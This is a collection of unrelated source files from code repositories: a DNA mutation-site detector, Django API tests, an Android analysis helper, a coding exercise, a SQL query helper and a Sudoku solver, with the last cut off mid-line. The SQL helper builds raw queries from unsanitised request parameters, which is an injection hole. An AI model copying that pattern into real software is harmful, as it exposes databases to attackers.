We get rid of middle regions, and from the edges find once again the\n ### site's coordinates\n\n df_slippage.loc[:, 'start_delta'] = df_slippage['start'] - df_slippage['start'].shift()\n df_slippage.loc[:, 'end_delta'] = df_slippage['end'].shift(-1) - df_slippage['end']\n df_slippage = df_slippage[(df_slippage.start_delta != 1.0) | (df_slippage.end_delta != 1.0)]\n df_slippage.loc[(df_slippage.end_delta == 1.0), 'end'] = None\n df_slippage.loc[:, 'end'] = df_slippage.loc[:, 'end'].fillna(method='bfill').astype(int)\n df_slippage = df_slippage[df_slippage.start_delta != 1.0][['start', 'end']]\n\n ### add sequence found, and length of base unit\n df_slippage.loc[:, 'sequence'] = df_slippage.apply(lambda x: genome_cutter(x['start'], x['end'], sequence), axis=1)\n df_slippage.loc[:, 'length_base_unit'] = L\n\n\n return df_slippage\n\n\n\ndef find_slippage_sites(seq, num_sites):\n\n ### create df of slippage sites for all base unit lengths up to 15\n slippage_sites_list = []\n for ii in range(1, 16):\n slippage_sites_list.append(find_slippage_sites_length_L(seq, ii))\n df_slippage = concat(slippage_sites_list, ignore_index=True)[['start', 'end', 'length_base_unit', 'sequence']]\n\n ### find nmber of repeats per site, and calculate mutation rate from empirical formula\n df_slippage.loc[:, 'num_base_units'] = df_slippage.sequence.apply(lambda x: len(x))/df_slippage.length_base_unit\n\n df_slippage.loc[:, 'log10_prob_slippage_ecoli'] = -4.749+0.063*df_slippage['num_base_units']\n df_slippage.loc[df_slippage.length_base_unit==1, 'log10_prob_slippage_ecoli'] = -12.9+0.729*df_slippage['num_base_units']\n\n ### return slippage sites, sorted by risk and limited in number of sites\n df_slippage= df_slippage.sort_values(['log10_prob_slippage_ecoli', 'length_base_unit'], ascending=[False, False])\n\n if type(num_sites) == int:\n df_slippage = df_slippage.head(num_sites)\n\n\n return df_slippage\n\n\n\ndef motif_prob_extractor(methylation_sites_path):\n ### open text file for extraction\n with open(methylation_sites_path, \"r\") as handle:\n motif_raw_data = handle.read()\n\n ### split text by motif\n motif_data_split = motif_raw_data.split('MOTIF')[1:]\n\n ### initiate dictionary which will keep motif probabilities\n motif_probs = {}\n\n for row in motif_data_split:\n ### get motif name from first row\n motif_name = row.split(\"\\n\")[0].split('_')[-1]\n ### get number of nucleotides in motif\n num_nucleotides = int(row.split(\"w= \")[1].split(' ')[0])\n ### get table of probabilities\n table_probs = [x for x in row.split(\"\\n\")[2:] if x!= '']\n\n ### extract num of nucleotides and probability of nucleotide per index\n motif_probs_curr = {x:{} for x in range(num_nucleotides)}\n motif_probs_curr['num_nucleotides'] = num_nucleotides\n\n for ii, prob_row in enumerate(table_probs):\n row_table_split = [float(x) for x in prob_row.split('\\t')]\n motif_probs_curr[ii]['A'] = row_table_split[0]\n motif_probs_curr[ii]['C'] = row_table_split[1]\n motif_probs_curr[ii]['G'] = row_table_split[2]\n motif_probs_curr[ii]['T'] = row_table_split[3]\n\n motif_probs[motif_name] = motif_probs_curr\n\n ### define and sort a summarizing dataframe for later merge\n df_site_probs = DataFrame.from_dict(motif_probs).T.reset_index().rename(columns = {'index':'matching_motif'})\n cols = sorted([x for x in list(df_site_probs) if type(x)==int])\n df_site_probs = df_site_probs[['matching_motif', 'num_nucleotides']+cols]\n\n return motif_probs, df_site_probs\n\n\n\n\ndef site_motif_grader(start_index, motif, example_seq):\n ### find a 
similarity measure between the sequence starting in current index, and current motif\n\n    conjugate_dict = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G'}\n\n    num_nucleotides = motif['num_nucleotides']\n\n    ### calculate the current sequence, and the reverse conjugate ending in current index\n    curr_seq = example_seq[start_index:(start_index+num_nucleotides)]\n    curr_seq_conjugate = ''.join([conjugate_dict[x] for x in curr_seq[::-1]])\n\n    ### if we're already at the end, return probability 0 (log10 of 0 is -inf).\n    if len(curr_seq)<num_nucleotides:\n        return -np.inf\n\n    ### the log10 probability of a match is the sum of the per-position log-probabilities;\n    ### grade both the sequence and its reverse conjugate, and keep the better score\n    log10_prob_seq = 0\n    log10_prob_conj = 0\n    for ii in range(num_nucleotides):\n        ### small epsilon avoids log10(0) for zero-probability nucleotides\n        log10_prob_seq += np.log10(motif[ii][curr_seq[ii]] + 1e-100)\n        log10_prob_conj += np.log10(motif[ii][curr_seq_conjugate[ii]] + 1e-100)\n\n    return max(log10_prob_seq, log10_prob_conj)\n\n\ndef calc_max_site(start_index, example_seq, motif_probs):\n\n    ### per start index, keep the motif with the highest match score for the sequence starting there\n\n    conjugate_dict = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G'}\n\n    log10_site_match = -np.inf\n    matching_motif = None\n    actual_site = ''\n    actual_site_rev_conj = ''\n    end_index = start_index\n\n    for site_name, motif in motif_probs.items():\n        num_nucleotides = motif['num_nucleotides']\n        curr_prob_log10 = site_motif_grader(start_index, motif, example_seq)\n        if curr_prob_log10>log10_site_match:\n            log10_site_match = curr_prob_log10\n            matching_motif = site_name\n            end_index = start_index+num_nucleotides-1\n            actual_site = example_seq[start_index:(end_index+1)]\n            actual_site_rev_conj = ''.join([conjugate_dict[x] for x in actual_site[::-1]])\n\n    return (actual_site, actual_site_rev_conj, matching_motif, start_index, end_index, log10_site_match)\n\n\n\ndef site_ranker(example_seq, num_sites, motif_probs):\n\n    ### per start index, extract best matching site and score, arrange in dataframe, sort and keep highest scores\n\n    site_ranking_list = []\n\n    for ii in range(len(example_seq)):\n        site_ranking_curr = calc_max_site(ii, example_seq, motif_probs)\n        site_ranking_list.append(site_ranking_curr)\n\n    df_methylation = DataFrame(site_ranking_list, columns=['actual_site', 'actual_site_rev_conj', 'matching_motif', 'start_index', 'end_index', 'log10_site_match'])\n\n    df_methylation = df_methylation.sort_values('log10_site_match', ascending=False)\n\n    if type(num_sites) == int:\n        df_methylation = df_methylation.head(num_sites)\n\n    return df_methylation\n\n\n\n\n\n\ndef suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path, extension = ''):\n\n\n    sites_collector = {}\n    df_recombination = find_recombination_sites(example_seq, num_sites)\n\n    df_slippage = find_slippage_sites(example_seq, num_sites)\n\n    sites_collector['df_recombination'+extension] = df_recombination\n    sites_collector['df_slippage'+extension] = df_slippage\n\n\n    ### do methylation only if requested\n    if compute_methylation == True:\n        motif_probs, df_site_probs = motif_prob_extractor(methylation_sites_path)\n\n        df_methylation = site_ranker(example_seq, num_sites, motif_probs)\n        df_methylation = df_methylation.merge(df_site_probs, on='matching_motif', how='left')\n        sites_collector['df_methylation' + extension] = df_methylation\n\n    return sites_collector\n\n\n\n#############################################################################################################\n### feature generation\n\n\n# def data_analyzer(df_slippage, df_recombination, df_methylation):\n#\n#\n#\n#     return df_features\n#\n#\n\ndef data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder):\n\n    if type(data) == list:\n\n        recombination_collector = []\n        slippage_collector = []\n        methylation_collector = []\n\n        for ii, record in enumerate(data[:30]):\n            example_seq = str(record.seq)\n\n            curr_sites_collector = suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path, extension = '_'+str(ii))\n\n            df_recombination = curr_sites_collector['df_recombination_'+str(ii)]\n            if len(df_recombination) >0:\n                df_recombination.loc[:, 'sequence_number'] = str(ii)\n                recombination_collector.append(df_recombination)\n\n            df_slippage = curr_sites_collector['df_slippage_' + str(ii)]\n            if len(df_slippage) >0:\n                df_slippage.loc[:, 'sequence_number'] = str(ii)\n                slippage_collector.append(df_slippage)\n\n            if compute_methylation == True:\n                df_methylation = 
curr_sites_collector['df_methylation_' + str(ii)]\n if len(df_methylation) > 0:\n df_methylation.loc[:, 'sequence_number'] = str(ii)\n methylation_collector.append(df_methylation)\n\n new_path = file.split(input_folder)[1].split('.fasta')[0]\n\n curr_output_path = output_path+new_path\n\n Path(curr_output_path).mkdir(parents=True, exist_ok=True)\n\n df_recombination = concat(recombination_collector)\n df_slippage = concat(slippage_collector)\n\n\n df_recombination.to_csv(join(curr_output_path, r'recombination_sites.csv'))\n df_slippage.to_csv(join(curr_output_path, r'slippage_sites.csv'))\n\n\n if compute_methylation == True:\n df_methylation = concat(methylation_collector)\n df_methylation.to_csv(join(curr_output_path, r'methylation_sites.csv'))\n\n else:\n example_seq = str(data.seq)\n\n sites_collector = suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path)\n\n ### save to output\n new_path = file.split('.fasta')[0]\n\n curr_output_path = join(output_path, new_path)\n\n Path(curr_output_path).mkdir(parents=True, exist_ok=True)\n\n sites_collector['df_recombination'].to_csv(join(curr_output_path, r'recombination_sites.csv'))\n sites_collector['df_slippage'].to_csv(join(curr_output_path, r'slippage_sites.csv'))\n\n\n if compute_methylation == True:\n sites_collector['df_methylation'].to_csv(join(curr_output_path, r'methylation_sites.csv'))\n\n return\n\n\n\n\ndef main(input_folder = os.getcwd(), output_path = join(os.getcwd(), 'output'), compute_methylation = False, num_sites = None,\n methylation_sites_path = join(os.getcwd(), r'topEnriched.313.meme.txt'), test = False):\n\n\n \"\"\"\n The function gets as input a directory. This directory and all subdirectories are copied into the output folder. Each fasta and fasta.gz\n file gets replaced by a directory of the same name, and populated by csv files, detailing recombination sites, slippage sites,\n and possibly methylation sites.\n\n\n Args:\n\n input_folder(str): path from which to read fasta and fasta.gz files. Default value is current path.\n\n output_path(str): directory into which to write csv's detailing suspect sites. Default value is 'output' within path of script.\n\n compute_methylation(bool): whether to calculate methylation sites. Relevant only for mammalian and insectoid cells.\n Default value is False.\n\n num_sites(Union[int, None]): How many values to keep per output file. If None, keep all. Default is None.\n\n methylation_sites_path(str): path of methylation sites file, which is an input to the methylation probability calculation.\n Default value is 'topEnriched.313.meme.txt' within script path.\n\n test(bool): whether this is a test run and you only need a couple of files for testing purposes. Default value: False.\n\n\n Returns:\n No variable. 
Saves output CSVs in output_path.\n    \"\"\"\n\n\n    files_1 = glob.glob(join(input_folder, '*', '*.fasta*'), recursive = True)\n    files = glob.glob(join(input_folder, '*.fasta*'), recursive = True)\n\n    if test == True:\n        files_1 = files_1[0:1]\n        files = files[0:1]\n\n    files.extend(files_1)\n\n    for file in files:\n        with open(file, \"r\") as handle:\n            data = list(parse(handle, \"fasta\"))\n\n        data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder)\n\n    for file in glob.glob(join(input_folder, '*', '*.fasta.gz'), recursive = True):\n        with gzip.open(file, \"rt\") as handle:\n            data = list(parse(handle, \"fasta\"))\n\n        data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder)\n\n    return\n\n\n# input_folder = join(os.getcwd(), 'fasta_draft_200703')\n# output_path = join(os.getcwd(), 'new_output', 'output')\n# compute_methylation = True\n# num_sites = 100\n# methylation_sites_path = join(os.getcwd(), r'topEnriched.313.meme.txt')\n# test = True\n#\n# main(input_folder = input_folder, output_path = output_path, compute_methylation = compute_methylation, num_sites = num_sites,\n#      methylation_sites_path = methylation_sites_path, test = test)\n#\n#\n","repo_name":"AmitayNiv/iGEM","sub_path":"EFM/EFM_detector_generalized.py","file_name":"EFM_detector_generalized.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"73381914456","text":"from django.test import TestCase\nfrom unittest.mock import patch\nfrom django.utils import timezone\n\nfrom tournament_api.settings import TIME_ZONE\nfrom eliminationtournaments.singletons import BGScheduler\n\nclass SingletonTest(TestCase):\n\n    def setUp(self) -> None:\n        pass\n\n    def test_singleton_instance(self):\n        instance1 = BGScheduler.get_instance()\n        instance2 = BGScheduler.get_instance()\n        self.assertIs(instance1, instance2, \"Instances should be the same\")\n\n    def test_print_data(self):\n        instance = BGScheduler.get_instance()\n        with patch('builtins.print') as mock_print:\n            instance.print_data()\n            mock_print.assert_called_with(instance)\n\n    def test_existing_bg_jobs(self):\n        bg = BGScheduler.get_instance()\n        now = timezone.now().timestamp()\n\n        end_date = timezone.datetime.fromtimestamp(now + 10)\n\n        bg.sched.add_job(lambda : print('Call me maybe'), 'date', run_date=end_date, timezone=TIME_ZONE)\n        self.assertTrue(len(bg.sched.get_jobs()) >= 1)\n","repo_name":"marcelobbfonseca/api-elimination-tournament-django","sub_path":"eliminationtournaments/tests/singletons.py","file_name":"singletons.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"73242560536","text":"from io import BytesIO\n\nimport pytest\nfrom PIL import Image\nfrom django.core.files import File\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom mock import MagicMock\nfrom model_bakery import baker\nfrom rest_framework import status\n\nfrom djangoProject.utils import create_picture\nfrom word.models import Category\n\n\n@pytest.fixture\ndef get_category(api_client):\n    def do_get_category(id=None):\n        if id:\n            return api_client.get(f'/kalameh/category/{id}/')\n        return api_client.get('/kalameh/category/')\n\n    return do_get_category\n\n\n@pytest.fixture\ndef get_category_id(api_client):\n    def do_category_word(id):\n        return api_client.get(f'/kalameh/category/{id}/')\n\n    return 
do_category_word\n\n\nmock_image = MagicMock(spec=File)\nmock_image.name = \"test.png\"\nmock_video = MagicMock(spec=File)\nmock_video.name = \"test.mp4\"\npost_data = {\n 'title': 'a',\n 'slug': 'a',\n 'pronunciation': 'a',\n 'video': mock_video,\n 'picture': mock_image,\n}\n\n\n@pytest.fixture\ndef create_category(api_client):\n def do_create_category(data):\n return api_client.post('/kalameh/category/', data)\n\n return do_create_category\n\n\n@pytest.fixture\ndef update_category(api_client):\n def do_update(data, id):\n return api_client.patch(f'/kalameh/category/{id}/', data)\n\n return do_update\n\n\n@pytest.fixture\ndef delete_category(api_client):\n def do_delete(id):\n return api_client.delete(f'/kalameh/category/{id}/')\n\n return do_delete\n\n\n@pytest.mark.django_db\nclass TestGetCategory:\n def test_if_anonymous_get_category_return_401(self, get_category):\n response = get_category()\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_authenticated_get_category_return_200(self, get_category, api_client, authenticate):\n authenticate(is_staff=False)\n\n response = get_category()\n\n assert response.status_code == status.HTTP_200_OK\n\n def test_if_anonymous_retrieve_category_return_401(self, get_category_id):\n category_obj = baker.make(Category)\n\n response = get_category_id(category_obj.id)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_authenticaed_retrive_category_return_200(self, get_category_id, api_client, authenticate):\n authenticate(is_staff=False)\n category_obj = baker.make(Category)\n\n response = get_category_id(category_obj.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_200_OK\n\n def test_if_user_is_authenticaed_get_word_return_404(self, get_category_id, api_client, authenticate):\n authenticate(is_staff=False)\n\n response = get_category_id(2534562)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\nclass TestCreateCategory:\n def test_if_user_is_anonymous_return_401(self, create_category):\n response = create_category({})\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_not_admin_return_403(self, create_category, authenticate):\n authenticate(is_staff=False)\n\n response = create_category({})\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_data_is_invalid_return_400(self, create_category, authenticate):\n authenticate(is_staff=True)\n\n response = create_category({})\n\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n assert response.data['title'] is not None\n\n def test_if_data_is_valid_return_201(self, create_category, authenticate):\n authenticate(is_staff=True)\n file = create_picture()\n new_data = post_data.copy()\n new_data['picture'] = file\n\n response = create_category(data=new_data)\n file.close()\n print(response.data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n\n@pytest.mark.django_db\nclass TestUpdateCategory:\n def test_if_user_is_anonymous_patch_return_401(self, update_category):\n category_put = baker.make(Category)\n response = update_category({}, id=category_put.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_not_admin_patch_return_200(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id)\n print(response.data)\n\n assert 
response.status_code == status.HTTP_200_OK\n\n def test_if_user_is_not_admin_patch_return_403(self, update_category, authenticate):\n authenticate(is_staff=False)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_data_is_invalid_category_return_400(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'picture':124},id=category_put.id)\n\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n\n def test_if_user_is_not_admin_patch_return_404(self, update_category, authenticate):\n authenticate(is_staff=True)\n category_put = baker.make(Category)\n\n response = update_category({'title': 'a'}, id=category_put.id + 100)\n print(response.data)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\nclass TestDeleteCategory:\n def test_if_user_is_anonymous_delete_category_return_401(self, delete_category):\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_word_return_403(self, delete_category, authenticate):\n authenticate(is_staff=False)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_if_user_is_delete_word_return_204(self, delete_category, authenticate):\n authenticate(is_staff=True)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_204_NO_CONTENT\n\n def test_if_user_is_not_admin_delete_return_404(self, delete_category, authenticate):\n authenticate(is_staff=True)\n category_delete = baker.make(Category)\n\n response = delete_category(id=category_delete.id + 100)\n print(response.data)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n","repo_name":"matin138213/eshareh_api","sub_path":"word/tests/test_category.py","file_name":"test_category.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20342309021","text":"# coding:utf-8\n\"\"\"\n @auth wangzhixiang\n @time 2019/3/15 12:02\n\"\"\"\ndef get_interface_method_by_desc(dvm, implement_interface, method_and_descriptor_list):\n\tdict_result = {}\n\tfor cls in dvm.get_classes():\n\t\tif is_class_implements_interface(cls, implement_interface) is True:\n\t\t\tclass_name = cls.get_name()\n\t\t\tif class_name not in dict_result:\n\t\t\t\tdict_result[class_name] = []\n\t\t\tfor method in cls.get_methods():\n\t\t\t\tmethod_and_desc = method.get_name() + method.get_descriptor()\n\t\t\t\tif method_and_desc in method_and_descriptor_list:\n\t\t\t\t\tdict_result[class_name].append(method)\n\treturn dict_result\n\ndef is_class_implements_interface(cls, implement_interface):\n\tclass_interface = cls.get_interfaces()\n\tif class_interface is None:\n\t\treturn False\n\tfor imp in implement_interface:\n\t\tif imp not in class_interface:\n\t\t\treturn False\n\treturn True\n\n\ndef check_have_override(class_and_methods_dict):\n\tnot_override_list = []\n\tfor class_name, methods in class_and_methods_dict.items():\n\t\tfor method in methods:\n\t\t\tins_count = 0\n\t\t\tfor ins in 
method.get_instructions():\n\t\t\t\tins_count = ins_count + 1\n\t\t\tif ins_count < 4:\n\t\t\t\tnot_override_list.append(class_name+ method.get_name() + method.get_descriptor())\n\treturn not_override_list\n\nif __name__ == '__main__':\n\tpass","repo_name":"MagiCiAn1/WoodPecker","sub_path":"StaticAnalyzer/views/android/analyzer_helper.py","file_name":"analyzer_helper.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"40692656599","text":"#\r\n# Skeleton file for the Python \"Bob\" exercise.\r\n#\r\ndef hey(what):\r\n Answer = ''\r\n if what == what.upper() and any(s.isalpha() for s in what):\r\n Answer = 'Whoa, chill out!'\r\n elif what.strip().endswith('?'):\r\n Answer = \"Sure.\"\r\n elif what.isspace() or what == '':\r\n Answer = \"Fine. Be that way!\"\r\n else:\r\n Answer = \"Whatever.\"\r\n return Answer\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/039c5c8a0d204fd5b5c2fec3bb3a874b.py","file_name":"039c5c8a0d204fd5b5c2fec3bb3a874b.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"42721895757","text":"import re\nfrom typing import Any, Iterable, List, Optional, Sequence\n\nfrom sqlalchemy import Row, Table, TextClause, text\nfrom starlette.requests import Request\n\n\ndef parse_conditions_from_query_params(request: Request) -> list:\n query_params = request.query_params\n conditions = []\n op_map = {\n \"gte\": \">=\",\n \"lte\": \"<=\",\n \"gt\": \">\",\n \"lt\": \"<\",\n }\n for key, value in query_params.items():\n if key in (\"fields\", \"sort\"):\n continue\n match = re.match(r\"(.+)\\[(gte|lte|gt|lt)\\]\", key)\n if match:\n field, op = match.groups()\n op = op_map[op]\n else:\n field, op = key, \"=\"\n conditions.append(f\"{field} {op} {value}\")\n\n return conditions\n\n\ndef get_fields_from_query_params(request: Request, table: Table) -> List[str]:\n fields = request.query_params.get(\"fields\")\n if not fields: # return all fields\n return [field.__str__() for field in table.c.keys()]\n return fields.split(\",\")\n\n\ndef get_sort_fields_from_query_params(request: Request) -> List[str]:\n sort_by = request.query_params.get(\"sort\")\n if not sort_by:\n return []\n return sort_by.split(\",\")\n\n\ndef build_statement(\n table_name: str,\n fields: Iterable[str],\n conditions: Optional[List[str]],\n order_by: Optional[List[str]],\n) -> TextClause:\n statement = f\"SELECT {','.join(fields)} \" f\"FROM {table_name}\"\n if conditions:\n statement += f\" WHERE {' AND '.join(conditions)}\"\n\n if order_by:\n order_by = [s + \" DESC\" for s in order_by]\n statement += f\" ORDER BY {','.join(order_by)}\"\n\n statement += \";\"\n return text(statement)\n\n\ndef build_response_for_compensation(query: Sequence[Row[Any]], fields: List[str]):\n response = []\n for item in query:\n response.append(dict(zip(fields, item.t)))\n return response\n","repo_name":"Lopatk1n/CompensationCRUD","sub_path":"src/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25508381390","text":"import argparse\nimport csv\n\nfrom collections import Counter\nfrom copy import deepcopy\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Union\n\nNUMBERS = [str(number) for number in range(10)]\n\n\nclass 
SudokuTable:\n def __init__(self, file_name: str):\n self.rows = []\n self.columns = [[] for _ in range(9)]\n self.squares = [[] for _ in range(9)]\n\n # Initialize a dictionary for mapping coordinates to their respective\n # squares.\n self.coordinate_to_square = {}\n\n # Initialize a dictionary for storing the true numbers found in a square.\n self.square_to_numbers = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n 6: [],\n 7: [],\n 8: [],\n }\n\n # Set up a dictionary mapping squares to all their coordinates.\n self.square_to_coordinates = deepcopy(self.square_to_numbers)\n\n # Initialize dictionaries for storing the true numbers found in rows and\n # columns. Deep copies of the dictionary above are used for convenience.\n self.row_to_numbers = deepcopy(self.square_to_numbers)\n self.column_to_numbers = deepcopy(self.square_to_numbers)\n\n # Read a Sudoku from a file.\n self._read_sudoku_from_file(file_name)\n\n def _read_sudoku_from_file(self, filename: str):\n with open(filename, \"r\") as sudoku_file:\n csv_reader = csv.reader(sudoku_file, delimiter=\",\")\n for row_number, row in enumerate(csv_reader):\n row = [int(entry) if entry in NUMBERS else entry for entry in row]\n self._fill_row(row, row_number)\n self._fill_columns(row)\n self._fill_squares(row, row_number)\n\n if len(self.rows) != 9 and not all([len(row) == 9 for row in self.rows]):\n raise Exception(\"The Sudoku table is invalid.\")\n\n def _fill_row(self, row: List[str], row_number: int):\n self.rows.append(row)\n for entry in row:\n if type(entry) == int:\n self.row_to_numbers[row_number].append(entry)\n\n def _fill_columns(self, row: List[List[str]]):\n for column_number, entry in enumerate(row):\n self.columns[column_number].append(entry)\n if type(entry) == int:\n self.column_to_numbers[column_number].append(entry)\n\n def _fill_squares(self, row: List[Union[str, int]], row_number: int):\n \"\"\"\n This method could be refactored.\n :param row:\n :param row_number:\n :return:\n \"\"\"\n if 0 <= row_number < 3:\n start = 0\n end = 3\n for square_num in range(3):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n elif 3 <= row_number < 6:\n start = 0\n end = 3\n for square_num in range(3, 6):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n else:\n start = 0\n end = 3\n for square_num in range(6, 9):\n self.squares[square_num].append(row[start:end])\n for index in range(start, end):\n self.coordinate_to_square[(row_number, index)] = square_num\n self.square_to_coordinates[square_num].append((row_number, index))\n if type(row[index]) == int:\n self.square_to_numbers[square_num].append(row[index])\n start = end\n end += 3\n\n def set_field(self, row: int, column: int, value: int):\n self.rows[row][column] = value\n self.columns[column][row] = value\n\n def get_field(self, row: int, column: int) -> int:\n return self.rows[row][column]\n\n def print_table(self):\n for row in self.rows:\n for entry in row:\n print(entry, end=\" \")\n print()\n\n\nclass SudokuSolver:\n 
def __init__(self, table: SudokuTable):\n self.table = table\n\n self.possible = {}\n self._initialise_possible()\n\n def _initialise_possible(self):\n for row, column in self.table.coordinate_to_square:\n if isinstance(self.table.rows[row][column], str):\n self.possible[(row, column)] = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n else:\n self.possible[(row, column)] = self.table.rows[row][column]\n\n def solve(self):\n iter_count = 0\n while (\n any([type(possible) != int for possible in self.possible.values()])\n and iter_count < 9\n ):\n # Use easy_solve until self.possible is not changed by it anymore.\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.easy_solve()\n\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.check_two_item_coordinate_per_square()\n\n possible_copy = None\n while possible_copy != self.possible:\n possible_copy = self.possible\n self.check_single_elements_in_column()\n self.check_single_elements_in_row()\n\n iter_count += 1\n\n self.check_table_validity()\n\n if any([type(possible) != int for index, possible in self.possible.items()]):\n self.print_resulting_table()\n print(\"This Sudoku cannot be solved by this program.\")\n else:\n self.print_resulting_table()\n\n def easy_solve(self):\n \"\"\"\n Check the output of the easy sudoku to see whether this really works.\n :return:\n \"\"\"\n for row_number in range(len(self.table.rows)):\n for column_number in range(len(self.table.columns)):\n coordinate = (row_number, column_number)\n if type(self.possible[coordinate]) == list:\n self.check_row_easy_solve(coordinate)\n if type(self.possible[coordinate]) == list:\n self.check_column_easy_solve(coordinate)\n if type(self.possible[coordinate]) == list:\n self.check_square_easy_solve(coordinate)\n\n def check_row_easy_solve(self, coordinate: Tuple[int, int]):\n for true_number in self.table.row_to_numbers[coordinate[0]]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n if new_true not in self.table.row_to_numbers[coordinate[0]]:\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_column_easy_solve(self, coordinate: Tuple[int, int]):\n for true_number in self.table.column_to_numbers[coordinate[1]]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n if new_true not in self.table.column_to_numbers[coordinate[1]]:\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_square_easy_solve(self, coordinate: Tuple[int, int]):\n relevant_square = self.table.coordinate_to_square[coordinate]\n\n for true_number in self.table.square_to_numbers[relevant_square]:\n if true_number in self.possible[coordinate]:\n self.possible[coordinate].remove(true_number)\n\n if 
len(self.possible[coordinate]) == 1:\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n if (\n new_true\n not in self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ]\n ):\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1], new_true)\n\n def check_two_item_coordinate_per_square(self):\n \"\"\"\n Seemed to work at first sight but check again!\n :return:\n \"\"\"\n # Iterate over all 9 squares.\n for square, coordinates in self.table.square_to_coordinates.items():\n # Make a list of all values with 2 possible numbers.\n two_numbers = [\n tuple(self.possible[coordinate])\n for coordinate in coordinates\n if isinstance(self.possible[coordinate], list)\n and len(self.possible[coordinate]) == 2\n ]\n # Set up a set with equal values from the list with 2 possible numbers.\n entry_counter = Counter(two_numbers)\n equal_entries = set(\n [entry for entry in two_numbers if entry_counter[entry] > 1]\n )\n\n # Don't bother getting into the for loop if no equal entries of\n # length 2 exist.\n if equal_entries:\n for coordinate in coordinates:\n for equal_entry in equal_entries:\n for number in equal_entry:\n if (\n isinstance(self.possible[coordinate], list)\n and 